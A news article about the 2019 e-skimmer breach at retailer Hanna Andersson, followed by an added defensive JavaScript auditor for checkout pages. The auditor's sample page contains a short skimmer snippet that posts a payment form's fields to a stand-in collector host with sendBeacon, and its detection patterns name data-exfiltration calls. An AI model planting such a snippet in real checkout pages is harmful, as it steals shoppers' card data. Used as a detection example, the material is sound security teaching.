Hackers Used an E-Skimmer on HannaAndersson.com to Collect Sensitive Data, and Now It's Sold Online

Hanna Andersson Data Breach

Sometimes, cybercriminals want to make their presence known. In a ransomware attack, for example, you learn that something's wrong as soon as your files become unusable and your screen displays the ransom note. In other cases, however, the attacks are silent and remain unnoticed for months. Children's clothes retailer HannaAndersson.com was first hit by an e-skimmer attack in mid-September 2019, but it wasn't until December 5 that the company learned about the problem, after law enforcement agencies told it that some of its customers' credit card details were being traded on the underground markets. As for those customers, they had no idea about the incident until earlier this month, when Hanna Andersson finally sent out the data breach notifications.

In this particular case, the hackers were more than happy to remain under the radar because stealth is a key factor in any e-skimming operation.

What is an e-skimmer?

Some cybersecurity terms are more descriptive than others, and we reckon that "e-skimming" is fairly easy to understand. We're pretty sure that most of you are familiar with the concept of physical skimmers that steal people's banking card details at ATMs and POS terminals. E-skimmers work in a similar way on online shops.

Usually, e-skimmers consist of several lines of JavaScript code that are injected into a website's checkout page. This code scrapes all the payment information users enter and sends it to the crooks. The criminals are interested in the most sensitive data – the card number, the cardholder name, the expiration date, the CVV code, and, in the case of Hanna Andersson, the shipping and billing addresses. In a well-executed attack, the retailer and the customer remain none the wiser, which means that the campaign can continue for a prolonged period of time.
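As an added illustration (not code from the original article or from Hanna Andersson), here is how a shop's defenders might audit a checkout page for the kind of injected JavaScript described above: the code reports script tags loaded from origins outside an allowlist, allowed third-party scripts that lack Subresource Integrity, and inline scripts that both read form fields and send data out. The hostnames, the allowlist and the sample HTML are constructed assumptions.

```javascript
// Added example: audit the <script> tags of a checkout page against an allowlist.
// ALLOWED_ORIGINS, SAMPLE_CHECKOUT and every hostname here are constructed assumptions.
const ALLOWED_ORIGINS = new Set([
  "https://shop.example",        // the shop's own origin (hypothetical)
  "https://js.payments.example", // its payment provider (hypothetical)
]);

// The two halves of skimmer behaviour: reading form fields and sending data out.
const READS_FIELDS = /\.value\b|FormData\s*\(|querySelectorAll?\s*\(\s*["'][^"']*input/;
const SENDS_DATA = /\bfetch\s*\(|XMLHttpRequest|sendBeacon\s*\(|new\s+Image\b|\.src\s*=/;

function auditCheckoutScripts(html, pageUrl, allowed = ALLOWED_ORIGINS) {
  const findings = [];
  const scriptTag = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = scriptTag.exec(html)) !== null) {
    const [, attrs, body] = m;
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(attrs);
    if (src) {
      const url = new URL(src[1], pageUrl); // resolves relative and protocol-relative URLs
      const crossOrigin = url.origin !== new URL(pageUrl).origin;
      if (!allowed.has(url.origin)) {
        findings.push({ kind: "unlisted-origin", detail: url.href });
      } else if (crossOrigin && !/\bintegrity\s*=/i.test(attrs)) {
        findings.push({ kind: "missing-sri", detail: url.href });
      }
    } else if (READS_FIELDS.test(body) && SENDS_DATA.test(body)) {
      // Heuristic only: an inline script that touches form data and a network sink.
      findings.push({ kind: "inline-reads-and-sends", detail: body.trim().slice(0, 60) });
    }
  }
  return findings;
}

// Constructed sample page: one first-party script, one allowed third party without SRI,
// one script from an unknown origin, and one inline script that posts the form elsewhere.
const SAMPLE_CHECKOUT = `
<form id="pay"><input name="cc-number"><input name="cc-exp"></form>
<script src="/static/checkout.js"></script>
<script src="https://js.payments.example/v3.js"></script>
<script src="//stats.unknown-cdn.example/t.js"></script>
<script>
  document.getElementById("pay").addEventListener("submit", function () {
    navigator.sendBeacon("https://collect.unknown-cdn.example/p", new FormData(this));
  });
</script>`;

console.log(auditCheckoutScripts(SAMPLE_CHECKOUT, "https://shop.example/checkout"));
```

A static audit like this only sees what is in the served HTML; a tampered first-party file or a script added at runtime will not show up, so it complements a Content-Security-Policy and file-integrity monitoring rather than replacing them.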

Over the last few years, the popularity of e-skimmers has exploded. These tools are used by numerous cybercriminals with different skillsets and levels of sophistication. Not that long ago, the word Magecart was coined, which is now used as a common term for the many different versions of an e-skimmer used by numerous hacking groups spread all around the world. Currently, most cybersecurity experts agree that Magecart is one of the most formidable threats we're faced with.

Was Hanna Andersson hit by Magecart?

Plenty of news outlets have jumped to the conclusion that Hanna Andersson is just the next in a long line of Magecart victims, but the truth is, the word "Magecart" is nowhere to be found in the retailer's official announcement. In fact, if the notification is anything to go by, the incident didn't actually happen at Hanna Andersson.

The message reads that the malware actually affected Salesforce Cloud – the CRM platform used by Hanna Andersson. Potentially, this is bad news because Salesforce is a large company with plenty of customers. If there really is a problem in Salesforce's systems, the number of affected individuals could be significant.

The CRM service provider hasn't publicly confirmed or denied getting infected with any sort of malware, but a Hanna Andersson spokesperson told CyberScoop that a Salesforce team is helping with the investigation. Cybersecurity experts and representatives of the FBI and the Department of Homeland Security have been dispatched to assist as well, and we hope that we'll soon have more information on what actually happened.

In the meantime, people who bought goods from Hanna Andersson's online shop between September 16 and November 11 (when the malware was deleted) should be especially careful with their bank statements. The data breach notification letter says that not all customers were affected, but just in case, everyone that made a purchase during the aforementioned period is offered a year of identity theft protection and credit monitoring services for free. Those eligible should bear in mind that the enrolment deadline is April 15.

As we mentioned already, this is hardly the first attack of this sort, and you can be pretty sure that it won't be the last. Quite a few major online retailers have been hit, and it's safe to say that no online shop, no matter how big and popular it is, is safe. This means that even if you haven't received Hanna Andersson's data breach alert, you should still regularly check your bank statements for any transactions that you might not recognize.

January 24, 2020
